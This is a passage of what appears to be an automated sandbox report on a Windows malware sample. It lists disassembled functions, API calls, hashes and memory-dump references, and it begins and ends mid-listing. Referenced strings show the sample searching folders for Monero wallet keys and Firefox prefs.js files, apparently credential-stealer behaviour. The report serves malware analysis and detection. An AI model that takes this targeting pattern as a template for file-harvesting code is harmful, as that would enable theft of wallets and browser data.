                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 2e81663ea0b5480c4543807f6ddef3af01c6070bf2b633eee2796d0d0ca5f5c1
                            • Instruction ID: 17ecaf162a809959499993bf59871151009994cc5e72bcec8d25752c86204a09
                            • Opcode Fuzzy Hash: 2e81663ea0b5480c4543807f6ddef3af01c6070bf2b633eee2796d0d0ca5f5c1
                            • Instruction Fuzzy Hash: 6F6164B2900618AFCF25EBA0DC49EEA77BCFB59704F044588F549A6040EB759B89CF91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00394580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00394587
                            • wsprintfA.USER32 ref: 003945A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 003945BD
                            • StrCmpCA.SHLWAPI(?,003A0FC4), ref: 003945EB
                            • StrCmpCA.SHLWAPI(?,003A0FC8), ref: 00394601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0039468B
                            • FindClose.KERNEL32(000000FF), ref: 003946A0
                            • lstrcat.KERNEL32(?,0115E858), ref: 003946C5
                            • lstrcat.KERNEL32(?,0115DAC0), ref: 003946D8
                            • lstrlen.KERNEL32(?), ref: 003946E5
                            • lstrlen.KERNEL32(?), ref: 003946F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 78eb76d3e2728e804953fdc3e252be917b39748e627dbee17545957aca917dbd
                            • Instruction ID: 9fb4a68e76a8f11cef5f80f255d5ce961b7dfaeaa695682f216887ff39fb0488
                            • Opcode Fuzzy Hash: 78eb76d3e2728e804953fdc3e252be917b39748e627dbee17545957aca917dbd
                            • Instruction Fuzzy Hash: CF5166B290021C9FCB25EBB0DC89FED777CEB58304F404588F60996190EB759B898F92
                            APIs
                            • wsprintfA.USER32 ref: 00393EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 00393EDA
                            • StrCmpCA.SHLWAPI(?,003A0FAC), ref: 00393F08
                            • StrCmpCA.SHLWAPI(?,003A0FB0), ref: 00393F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0039406C
                            • FindClose.KERNEL32(000000FF), ref: 00394081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: 825499c665a6fb28f6f7ed5093a704ddb6b3af131655246e4e26740c846ba1cc
                            • Instruction ID: ac134226c8a142292185540a1a6c4351128ecff7f9b773924a59eb9737d7c940
                            • Opcode Fuzzy Hash: 825499c665a6fb28f6f7ed5093a704ddb6b3af131655246e4e26740c846ba1cc
                            • Instruction Fuzzy Hash: 4F5156B2900618AFCF25FBB0DC85EEA777CBB54704F004588F65996040EB759B8A8F91
                            APIs
                            • wsprintfA.USER32 ref: 0038ED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 0038ED55
                            • StrCmpCA.SHLWAPI(?,003A1538), ref: 0038EDAB
                            • StrCmpCA.SHLWAPI(?,003A153C), ref: 0038EDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0038F2AE
                            • FindClose.KERNEL32(000000FF), ref: 0038F2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: db1615eeeea62dd4f8f7c49b106757dc41fdd83c57e9c2490b61f211f9b56656
                            • Instruction ID: 5cb5283eba525e577deeeabbedd988c94372c50047f3a96566bf2890de7373ea
                            • Opcode Fuzzy Hash: db1615eeeea62dd4f8f7c49b106757dc41fdd83c57e9c2490b61f211f9b56656
                            • Instruction Fuzzy Hash: 1FE1F1729116189AEF56FB60CC52EEE7778AF54300F4042D9B50A66052EF306F8ADF92
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003A15B8,003A0D96), ref: 0038F71E
                            • StrCmpCA.SHLWAPI(?,003A15BC), ref: 0038F76F
                            • StrCmpCA.SHLWAPI(?,003A15C0), ref: 0038F785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0038FAB1
                            • FindClose.KERNEL32(000000FF), ref: 0038FAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: c850de1f326e7325085e5567317f8e005f8b5387cead9a951ecbb7ab576a05b2
                            • Instruction ID: 345190553593bfe3a6165fd0bb3eb4775beada9ea58b0bd76d1a38f9673c7302
                            • Opcode Fuzzy Hash: c850de1f326e7325085e5567317f8e005f8b5387cead9a951ecbb7ab576a05b2
                            • Instruction Fuzzy Hash: 9DB130719106189FDF26FB60DC96EEE7779AF54300F4082A8E40A9A141EF316B49CFD2
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003A510C,?,?,?,003A51B4,?,?,00000000,?,00000000), ref: 00381923
                            • StrCmpCA.SHLWAPI(?,003A525C), ref: 00381973
                            • StrCmpCA.SHLWAPI(?,003A5304), ref: 00381989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00381D40
                            • DeleteFileA.KERNEL32(00000000), ref: 00381DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00381E20
                            • FindClose.KERNEL32(000000FF), ref: 00381E32
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: e8bc45e8eb5968bd0ddab93fff29ab825be0027592622213ad00f45450d1dcb5
                            • Instruction ID: 3a0518717faf1c9664d67be8a45899cd1d89ffe58afa35426af9825ce381a83b
                            • Opcode Fuzzy Hash: e8bc45e8eb5968bd0ddab93fff29ab825be0027592622213ad00f45450d1dcb5
                            • Instruction Fuzzy Hash: 7A12DD719246189BDF1AFB60CC96EEE7778AF54300F404299B50A6A091EF306F89DFD1
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003A0C2E), ref: 0038DE5E
                            • StrCmpCA.SHLWAPI(?,003A14C8), ref: 0038DEAE
                            • StrCmpCA.SHLWAPI(?,003A14CC), ref: 0038DEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0038E3E0
                            • FindClose.KERNEL32(000000FF), ref: 0038E3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 6025f25a974ae067bda761f99ef03d728629f531ca7113b1f7625fa69c7074e0
                            • Instruction ID: 657f861a02882f2d322ce1ba1b83a16218c053819411782396eb43c43196ee86
                            • Opcode Fuzzy Hash: 6025f25a974ae067bda761f99ef03d728629f531ca7113b1f7625fa69c7074e0
                            • Instruction Fuzzy Hash: 18F180718246289ADF17FB60DC95EEE7778BF54300F5042D9A40A66091EF306F8ADF91
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003A14B0,003A0C2A), ref: 0038DAEB
                            • StrCmpCA.SHLWAPI(?,003A14B4), ref: 0038DB33
                            • StrCmpCA.SHLWAPI(?,003A14B8), ref: 0038DB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0038DDCC
                            • FindClose.KERNEL32(000000FF), ref: 0038DDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 4352db75c054b5525481e408a03103b11c45386ef412d974057e4cdbda4ac861
                            • Instruction ID: 22a5c966a220b8164038bfbea6eca7a428759c6bdf09bc6190cb3fb49b186b33
                            • Opcode Fuzzy Hash: 4352db75c054b5525481e408a03103b11c45386ef412d974057e4cdbda4ac861
                            • Instruction Fuzzy Hash: 369124729106189BDF16FBB0EC56DED777DAF94300F408658F90A9A181EE349B0D8BD2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !m_$!Bgk$&`vf$&`vf$FEur$LEw{$aQ0:$y[q
                            • API String ID: 0-1856721911
                            • Opcode ID: 14cfc3f1a6c7edd4ede8ef979387953f43050d4765a76f04ac544284c4db0088
                            • Instruction ID: 7ac733699ab3a01897b44b1b5e8c83d70fc28c93c663d662a080433dd23873d7
                            • Opcode Fuzzy Hash: 14cfc3f1a6c7edd4ede8ef979387953f43050d4765a76f04ac544284c4db0088
                            • Instruction Fuzzy Hash: 71B219F360C2049FE3046E2DEC8567AFBE9EF94720F1A463DEAC4C3744EA7558058696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: no?$'`?$+:lg$:[=[$_"$_E?$rZuy$z]?S
                            • API String ID: 0-3699099736
                            • Opcode ID: 4fe426dc953ef8a303e519667bf635b0bd95278b17d6d800465cc2fc1d49e670
                            • Instruction ID: 6ce4a91454515691e119380bb8baf5eb4f2a57eae0bb7c8adb1473e51ca0d91f
                            • Opcode Fuzzy Hash: 4fe426dc953ef8a303e519667bf635b0bd95278b17d6d800465cc2fc1d49e670
                            • Instruction Fuzzy Hash: 80B219F3A08200AFE304AE2DEC8567AB7E9EF94720F1A453DE6C5C7744EA3558058797
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: &a{?$2\e$:,x$<5|+$C2~w$Sio=$^.~$u}
                            • API String ID: 0-2510878995
                            • Opcode ID: 1bbd8a41cec596eca1a57e5a2de920806fa6141c34f0a2ad2abe0c8b7f529a76
                            • Instruction ID: baecc14b48d7ced702ab2c8d72e2c54a32d37bf489292e07bb59a09e4f8946f2
                            • Opcode Fuzzy Hash: 1bbd8a41cec596eca1a57e5a2de920806fa6141c34f0a2ad2abe0c8b7f529a76
                            • Instruction Fuzzy Hash: ACA2F8F3A0C2009FE3046E2DEC8567ABBE9EF94720F16893DEAC4C7744E67558058697
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
